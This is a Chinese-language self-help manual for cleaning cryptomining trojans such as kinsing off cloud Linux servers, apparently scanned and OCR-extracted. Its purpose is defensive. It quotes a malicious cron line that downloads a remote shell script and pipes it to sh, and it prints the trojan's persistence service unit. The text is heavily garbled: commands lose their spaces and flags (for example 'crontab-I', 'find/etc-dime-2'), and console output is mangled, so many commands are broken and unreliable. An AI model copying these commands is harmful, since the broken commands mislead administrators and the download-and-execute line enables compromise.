干貨：挖礦木馬自助清理手冊(cè)

干貨：挖礦木馬自助清理手冊(cè)

《挖礦木馬自助清理手冊(cè)》，可以為政企客戶安全運(yùn)維人員自助排查

清理挖礦木馬提供有益參考。

一、什么是挖礦木馬

挖礦木馬會(huì)占用CPU進(jìn)行超頻運(yùn)算從而占用主機(jī)大量的CPU資源，

嚴(yán)重影響服務(wù)器上的其他應(yīng)用的正常運(yùn)行。黑客為了得到更多的算力資源，

一般都會(huì)對(duì)全網(wǎng)進(jìn)行無差別掃描，同時(shí)利用SSH爆破和漏洞利用等手段攻

擊主機(jī)。

部分挖礦木馬還具備蠕蟲化的特點(diǎn)，在主機(jī)被成功入侵之后，挖礦木馬

還會(huì)向內(nèi)網(wǎng)滲透，并在被入侵的服務(wù)器上持久化駐留以獲取最大收益。

挖礦木馬的整體攻擊流程大致如下圖所示：

云主機(jī)

二、攙礦木馬中招特征

挖礦木馬會(huì)在用戶不知情的情況下利用主機(jī)的算力進(jìn)行挖礦，最明顯

的特征就是主機(jī)的CPU被大量消耗，查看云主機(jī)CPU占用率的方法有兩

種：

1、控制臺(tái)實(shí)例監(jiān)控

2、主機(jī)執(zhí)行TOP命令

如下圖所示，通過執(zhí)行top命令，即可在返回結(jié)果中看到當(dāng)時(shí)系統(tǒng)的

CPU占用率。

top-c

top-13:29:06up1day,25min,2users,loadaverage:1.21,0.30,0.10

Tasks:86tota12running,84sleeping,0stopped,0zombie

%Cpu(s):99.3us]0.3sy,0.0ni,0.0id,0.0wa,0.3hi,0.0si,0.0st

MiBMem:818.7total,109.1free,436.2used,273.4buff/cache

MiBSwap:0.0total,0.0free,0.0used.250.5availMem

1989813root10-1053865277287088S99.00.9―0s41?79trace

Too^2009551162842011558S077一-ZF2Tr97-YDServlce

1root20017700893526532S0.01.10:03.03systemd

_______2root200000S0.00.00:00.04kthreadd

如果云主機(jī)CPU占用率居高不下，那么主機(jī)很有可能已經(jīng)被植入了挖

礦木馬，會(huì)影響服務(wù)器上的其他應(yīng)用的正常運(yùn)行，需要立刻上機(jī)排查。

三、清理挖礦木馬

1、及時(shí)隔離主機(jī)

部分帶有蠕蟲功能的挖礦木馬在取得主機(jī)的控制權(quán)后，會(huì)繼續(xù)對(duì)公網(wǎng)

的其他主機(jī)，或者以當(dāng)前主機(jī)作為跳板機(jī)對(duì)同一局域網(wǎng)內(nèi)的其他主機(jī)進(jìn)行

橫向滲透，所以在發(fā)現(xiàn)主機(jī)被植入挖礦木馬后，在不影響業(yè)務(wù)正常運(yùn)行的前

提下，應(yīng)該及時(shí)隔離受感染的主機(jī)，然后進(jìn)行下一步分析和清除工作。

2、阻斷異常網(wǎng)絡(luò)通信

挖礦木馬不僅會(huì)連接礦池，還有可能會(huì)連接黑客的C2服務(wù)器，接收并

執(zhí)行C2指令、投遞其他惡意木馬，所以需要及時(shí)進(jìn)行網(wǎng)絡(luò)阻斷。

(1)檢查主機(jī)防火墻當(dāng)前生效的iptables規(guī)則中是否存在業(yè)務(wù)范圍之外的

可疑地址和端口，它們可能是挖礦木馬的礦池或C2地址

iptables-L-n

(2)從iptables規(guī)則中清除可疑地址和端口

vi/etc/sysconfig/iptables

(3)阻斷挖礦木馬的網(wǎng)絡(luò)通信

iptables-AINPUT-s可疑地址-jDROP

iptables-AOUTPUT-d可疑地址-jDROP

3、清除計(jì)劃任務(wù)

大部分挖礦木馬會(huì)通過在受感染主機(jī)中寫入計(jì)劃任務(wù)實(shí)現(xiàn)持久化，如

果僅僅只是清除挖礦進(jìn)程，無法將其根除，到了預(yù)設(shè)的時(shí)間點(diǎn)，系統(tǒng)會(huì)通過

計(jì)劃任務(wù)從黑客的C2服務(wù)器重新下載并執(zhí)行挖礦木馬。

挖礦木馬常見的計(jì)劃任務(wù)通常是下載并執(zhí)行sh腳本,如下圖所示：

[root@VM-0-10-centoscrontab-I

*****wget-q-0-18/unk.sh|sh>/dev/null2>&1

可以通過執(zhí)行如下命令查看是否存在可疑定時(shí)任務(wù)，若有，則先保存相

關(guān)記錄用于后續(xù)分析，再進(jìn)行刪除：

查看系統(tǒng)當(dāng)前用戶的計(jì)劃任務(wù)：

crontab-I

查看系統(tǒng)特定用戶的計(jì)劃任務(wù)：

crontab-uusername-I

查看其他計(jì)劃任務(wù)文件：

cat/etc/crontab

cat/var/spool/cron

cat/etc/anacrontab

cat/etc/cron.d/

cat/etc/cron.daily/

cat/etc/cron.hourly/

cat/etc/cron.weekly/

cat/etc/cron.monthly/

cat/var/spool/cron/

4、清除啟動(dòng)項(xiàng)

除了計(jì)劃任務(wù)，挖礦木馬通過添加啟動(dòng)項(xiàng)同樣能實(shí)現(xiàn)持久化?？梢允褂?/p>

如下命令查看開機(jī)啟動(dòng)項(xiàng)中是否有異常的啟動(dòng)服務(wù)。

CentOS7以下版本：

chkconfig-list

CentOS7及以上版本：

systemctllist-unit-files

如果發(fā)現(xiàn)有惡意啟動(dòng)項(xiàng)，可以通過如下命令進(jìn)行關(guān)閉：

CentOS7以下版本：

chkconfig服務(wù)名off

CentOS7及以上版本：

systemctldisable服務(wù)名

另外，還需要仔細(xì)排杳以下目錄及文件，及時(shí)刪除可疑的啟動(dòng)項(xiàng)：

/usr/lib/systemd/system

/usr/lib/systemd/system/multi-user.target.wants

/etc/rc.local

/etc/inittab/etc/rcO.d/

/etc/rcl.d/

/etc/rc2.d/

/etc/rc3.d/

/etc/rc4.d/

/etc/rc5.d/

/etc/rc6.d/

/etc/rc.d/

排查的時(shí)候，可以按照文件修改時(shí)間來排序，重點(diǎn)排查近期被創(chuàng)建服務(wù)

項(xiàng)。如下圖所示,系統(tǒng)近期被創(chuàng)建了一個(gè)名為bot.service的服務(wù)，該服務(wù)

在系統(tǒng)啟動(dòng)時(shí)會(huì)啟動(dòng)/etc/kinsing這個(gè)木馬文件，需要關(guān)閉bot服務(wù),并

刪除/etc/kinsing文件。

歷史

sysctl.d文件2大小類型修改時(shí)間▼權(quán)限用戶/用戶嗎

sysimage[bot.service193B2021/06/0915:28

9Bisystemdqdoud-srv.service513B15:48-rw-r-r--root/root

bootalop.service693B2021/04/1321:40-rw-r-r-root/root

catalogctoud-init.service6S3B2021/03/1911:45-rw-r--r-root/root

networkalopacct.service269B2020/12/2203:57-rw-r-r-root/root

ntp-units.dalopgpu.service222B2020/12/2203:57-rw-r--r-root/root

aiop-rotate.service132B2020/12/2203:57-rw-r-r-root/root

portable

aiop-rotate.timer98B2020/12/2203:57-rw-r--r-root/root

0口system

nftables.service393B2020/10/3012:14-rw-r-r-root/root

basic.target.wantscpupower.service294B2020/10/2208:32-rw-r--r-root/root

dbus.target.wantsqemu-guest-agent...S22B2020/09/3007:56-rw-r-r-root/root

default.target.wantssshd.service441B2020/08/2813:21-rw-r--r-root/root

graphical.target.wantsgrub-boot-indeter...263B2020/07/2907:46-rw-r-r-root/root

[root@VM-0-10-centoscat/usr/lib/systemd/system/bot.service

[Unit]

Description=Startdaemonatboottime

After=

Requires=

[Service]

Type=forking

RcstartScc=10s

Restart=always

TimeoutStartSec=5

ExecStart=/etc/kinsing

llnstaLlj

WantedBy=multi-user.target

[root@VM-0-10-centossystemctldisablebot

Removed/etc/systemd/system/multi-user.target.wants/bot.service.

[root@VM-0-10-centosrm-rf/etc/kinsing

5、清除預(yù)加載s。

通過配置/etc/ld.so.preload,可以自定義程序運(yùn)行前優(yōu)先加載的動(dòng)態(tài)

鏈接庫，部分木馬通過修改該文件，添加惡意so文件，從而實(shí)現(xiàn)挖礦進(jìn)程

的隱藏等惡意功能。

檢查/etc/ld.so.preload(該文件默認(rèn)為空)，清除異常的動(dòng)態(tài)鏈接庫。

可以執(zhí)行'>/etc/ld.so.preload'命令進(jìn)行清除。

[root(avM-0-10-centoscat/etc/ld.so.preload

/etc/libsystem.so_

[root@VM-0-10-centos~]#Is-al/etc/libsystem.so

-rwxrwxrwx1rootroot26800Jun1117:16/etc/libsysteni.so

[root(8VM-0-10-centos~]#>/etc/Id.so.preload

[root@VM-0-10-centos~j#rm-rf/etc/libsystem.so

[root(aVM-0-lO-centos

6、清除SSH公鑰

挖礦木馬通常還會(huì)在~/.ssh/authoruzed_keys文件中寫入黑客的

SSH公鑰，這樣子就算用戶將挖礦木馬清除得一干二凈，黑客還是可以免

密登陸該主機(jī)，這也是常見的保持服務(wù)器控制權(quán)的手段。

排查?/.ssh/authorized_keys文件,如果發(fā)現(xiàn)可疑的SSH公鑰，直接

刪除。

7、清除挖礦木馬

(1)清除挖礦進(jìn)程

挖礦木馬最大的特點(diǎn)就是會(huì)在用戶不知情的情況下，利用主機(jī)的算力

進(jìn)行挖礦,從而消耗主機(jī)大量的CPU資源，所以，通過執(zhí)行如下命令排杳

系統(tǒng)中占用大量CPU資源的進(jìn)程。

top-cps-ef

PIDUSER______PRNIVIRTRFSGHRSMPU叫FMTTME+COMMAND

82766root10-1053868895652S74.5.110:03.75./trace-r2-R

07

64540450838360:00.01top

02505204712206400:07.14/usr/lib/system

30200<0:00.01[kthreadd]

二^5

402000:00.00[rcu_gp]

00:00.00[rcu_par_gp]

60二200

802000:00.00[kworker/0:0H]

9t000:00.00[mm_percpu_jwq]

t200000:00.49[ksoftirqd/0]

2000:01.03[rcu_sched]

trt0

[migration/0]

trt000:00.00

t20000:00.00[watchdog/0]

t20000:00.00[cpuhp/0]

t000:00.00[kdevtmpfs]

000:00.00[netns]

2000A0:00.07[kauditd]

200v0:00.00[khungtaskd]

200

000:00.00[oom_reaper]

00:00.00[writeback]

0vA

500:00.01[kcompactdO]

00:00.00[ksmd]

確認(rèn)相關(guān)進(jìn)程為挖礦進(jìn)程后，按照如下步驟將其清除：

獲取并記錄挖礦進(jìn)程的文件路徑：

Is-I/proc/$PID/exe

殺死挖礦進(jìn)程：

kill-9$PID

刪除挖礦進(jìn)程對(duì)應(yīng)的文件

[root@VM-0-10-centos~]#Is-I/proc/82766/exe

Irwxrvxrwx1rootroot0Jun922:12/proc/82766/exe->/root/trace

[root@VM-0-10-centos~]#kill-982766殺男

[root@VM-0-lO-centosrm-rf/root/trace；

(2)清除其它相關(guān)惡意進(jìn)程

惡意進(jìn)程與外部的C2服務(wù)器進(jìn)行通信時(shí)，往往會(huì)開啟端口進(jìn)行監(jiān)聽。

執(zhí)行如下命令，查看服務(wù)器是否有未被授權(quán)的端口被監(jiān)聽。

netstat-antp

[root@VM-0-10-centosnetstat-antp

ActiveInternetconnections(serversandestablished)

ProtoRecv-QSend-QLocalAddressForeignAddressStatePID/Programname

tcp000.0.0.0:53550.0.0.0:*LISTBJ1090/systemd-rcsolv

tcp00e?0?0?0:22LISTBi1808/sshd

tcp00172?19.0.10:58336_______51.79.220^193:13333ESTABLISHED82085/./trace)

tcp000:22203,39:28458ESTABLISHED5346/sshd:root[pr

tcp000:5533013.^.9:443TIME_WAIT-

tcp。06:5851916gM/:5574ESTABLISHED5235/YDService

tcp600:::31458:::*LISTHi6559/kinsing

tcp600:::5355:::*CI5T011090/systemd-resolv

若有未授權(quán)進(jìn)程,按照如下步驟將其清除：

獲取并記錄未授權(quán)進(jìn)程的文件路徑

Is-I/proc/$PID/exe

殺死未授權(quán)進(jìn)程：

kill-9$PID

刪除未授權(quán)進(jìn)程對(duì)應(yīng)的文件

[root^/M-^-10-centosT#Is-I/proc/6559/exe

Irwxrwxrwx1rootroot0Jun922:15/proc/6559/exe->/etc/kinsing

[root@VM-0-10-centoskill-96559

[root@VM-0-10-centosrm-rf/etc/kinsing

[root@VM-0-10-centos|

還可以通過如下命令排查近期新增的文件，清除相關(guān)木馬

find/etc-dime-2（這里指定目錄為/etc,獲取近2天內(nèi)的新增文件）

Isof-ckinsing（這里要查看文件名為kinsing的相關(guān)進(jìn)程信息）

[root@VM-0-10-centos~]#find/etc-ctime-1

(/etc/kinsing_]

rroot@WR0^I0^centos~]#Lsof-ckinsing

COtTIANDPIDUSERFDTYPEDEVICESIZE/OFFNODEN^ME

kinsing2922rootcwdDIR253root

kinsing2922rootrtdDIR253,140962/

kinsing2922roottxtREG253,114643200280666/etc/kinsingJ

KinsingrootCRR1730T0??/?/dev/null-

kinsing2922rootIwCHR1,30t08878/dev/null

kinsing2922root2wCHR1,30t08878/dev/null

kinsing2922root3uWREG0,24029900/run/lock/linux.lock

kinsing2922root4ua_inode0,1408872[eventpoll]

kinsing2922root5rFIFO0,130t029669pipe

kinsing2922root6wFIFO0,130t029669pipe

kinsing2922root8uIPv6349410t0TCP*:31458(LISTHM)

[root@VM-0-10-centos~]#kill-929223rm-rf/etc/kinsing

8、風(fēng)險(xiǎn)排查、安全加固

對(duì)系統(tǒng)進(jìn)行風(fēng)險(xiǎn)排查和安全加固，避免挖礦木馬卷土重來，

四.常見問題

1、明明剛剛清理了挖礦木馬，沒過多久就又卷土重來？

很多用戶會(huì)反饋挖礦木馬老是清理不干凈，明明已經(jīng)Kill了進(jìn)程，刪除

了木馬文件，沒過多久，CPU占用率又上來了。究其根本，還是因?yàn)榍宄?/p>

得不夠徹底。大部分用戶都只是Kill掉挖礦進(jìn)程和對(duì)應(yīng)文件，卻沒有清理計(jì)

劃任務(wù)和守護(hù)進(jìn)程。

一般建議先清除計(jì)劃任務(wù)、啟動(dòng)項(xiàng)、守護(hù)進(jìn)程，再清除挖礦進(jìn)程和其他

惡意進(jìn)程。

2、如何判定可疑進(jìn)程是否為惡意進(jìn)程？

如下圖所示，未知進(jìn)程kinsing監(jiān)聽本地31458端口，非?？梢?，可

通過如下方法判定：

(1)執(zhí)行'Is-al/proc/$PID/exe'確認(rèn)可疑進(jìn)程對(duì)應(yīng)的文件；

(2)若文件未被刪除，則直接上傳文件到Virustotal進(jìn)行檢測(cè)，或者計(jì)算

出文件對(duì)應(yīng)的md5，使用md5去Virustotal進(jìn)行查詢；若文件已被刪除，

可執(zhí)行'cat/proc/$PID/exe>/tmp/t.bin'將進(jìn)程dump到特定目錄,再

上傳文件到Virustotal或者計(jì)算dump文件對(duì)應(yīng)的md5到Virustotal進(jìn)

行查詢。如果有多款殺毒引擎同時(shí)檢出，那基本可以判定該進(jìn)程為惡意進(jìn)程。

[root(aVM-0-10-centosnetstat-antp

ActiveInternetconnections(serversandestablished)

ProtoRecv-QSend-QLocalAddressForeignAddressStatePID/Programname

tcp00:53550.0.0.0:*LIS同897/systemd-resolve

tcpu0LlbltN12b3/sshd

tcp000:229:40703ESTABLISHED1365/sshd:root[pr

tcp000:5106656:80TIME_WAIT

tcp0840:2222:46430ESTABLISHED4441/sshd:unknown

tcp000:60976169AW55:S574ESTABLISHEDJ2469ZYDServlce

tcp600：::31458:::*LISTBI2922/kinsing

tcp600TT:5355-"HTF"Lib1tri-wz/systemd-resolve

[root@VM-0-10-centosIs-al/proc/2922/exe

Irwxrwxrwx1rootroot0Jun1117:16/proc/2922/exe->/etc/kinsing

[root@VM-^-10-centosmd5sum/etc/kinsing

md5sum:/etc/kinsing:Nosuchfileordirectory

[root@VM-0-10-centos~]#cat/proc/2922/exe>/tmp/t.bin

[root@VM-0-10-centosmd5sum/tmp/t.bin

648effa354b3cbaad87b45f48d59c616/tnp/t.bin

13%MB2021-0^0616:1X47UTC

DETECTIONBETAILSRELATIONSBEHAVIORCONTENTSUBMISSIONSCOMMUNITY

CrowdsourcedYARABIIM

Matchesn4e7e<xo?byintezerAnafyzefromrulesetRussianAPTathttpsy/grthubcomAntezeflyara-rules

▼

MatchesMenrr^—kr5mgTo?vyLambert.RedCanaryfromrulesetcrlme.himiner.Mnsingat

Antivirusresultson20,6&Ti6?4v

Ad-AwareQTro0n.G?nericKD45032277AegHUbQTfoiMiLjnwcAgent4!c

AhnlM>-V3QCoinMrwrnjnux.Ag<t,U643200ALY^cQTro)anIkxaAgm

Antiy-AVL①Tro0n/G?wic.ASaF3O95FAvast①eLF^gMAPQlTrf)

3、為什么系統(tǒng)CPU占用率接近100%,卻看不到是哪個(gè)進(jìn)程導(dǎo)致的？

如下圖所示,系統(tǒng)CPU占用率接近100%,卻看不到是哪個(gè)進(jìn)程導(dǎo)致

的，這種情況一般是因?yàn)橄到y(tǒng)命令被木馬篡改了，從而隱藏了木馬進(jìn)程的蹤

跡，讓用戶無法進(jìn)行溯源分析。

top-17:18:01up2min,2users,loadaverage:0.67,0.29,0.11

si_9stnta】,—.1running,94sleeping,0stopped,0zombie

(S)：99.9/1.01001IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIHIIII

MiBMetin-818.7total,90.6free,472.2used,255.8buff/cache

MiBSwap:0.0total.0.0free,0.0used.215.8availMem

721dbus2007480056644848S0.370:00.10dbus-daemon

70:00.36YDService

2498root2006592081646813284S00:00,21YDEdr

1root200177060112528356S30:01.29systemd

2root20000S00:00.00kthreadd

3root0-2000I00:00.00rcu_gp

4root0-200I00:00.00rcu_par_gp

命令篡改有多種方式，分別如下：

(1)top源文件被篡改,惡意進(jìn)程信息被過濾后返回

gop.original版|grep-vKzzh\|pnscanw

[root@iZ2ze831zo0a',w9s0c5bcZbin]#

入

文件命令

/usr/bin歷史。［志工

婚型

特人修改時(shí)間權(quán)限

件

J文

■teamdctl29KB2020/10/0100:51-rwxr-xr-x

件

bin文)/0

■teamnl19.1KB2020/10/0100:51-rwxr-xr-x)/0

件

boot文

Itee324KB2020/11/1706:24-rwxr-xr-x)/0

件

dev文)/0

-rwxr-xr-x

■test36.5KB件2020/11/1706:24

文)/0

uetc■estgdbm29.8KB2014/06/1005:39-rwxr-xr-x

件

文)/0

2017/09/0706:08-rwxr-xr-x

home64.3KB件

文)/0

|me)/0

15.5KB件2014/06/1221:29-rwxr-xr-x

lib文

Wnedatectl)/0

330.2KB件2020/11/1700:47-rwxr-xr-x

Iib64□